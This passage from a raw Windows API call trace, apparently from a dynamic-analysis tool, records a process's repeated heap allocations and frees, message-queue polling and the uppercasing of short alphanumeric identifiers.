(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9e84) returned 0x3571018 [0262.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0262.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9e84) returned 0x24c18d8 [0262.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.567] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.567] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.568] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.568] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.569] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.573] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.573] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.574] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.574] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.575] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.575] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.576] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.576] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: 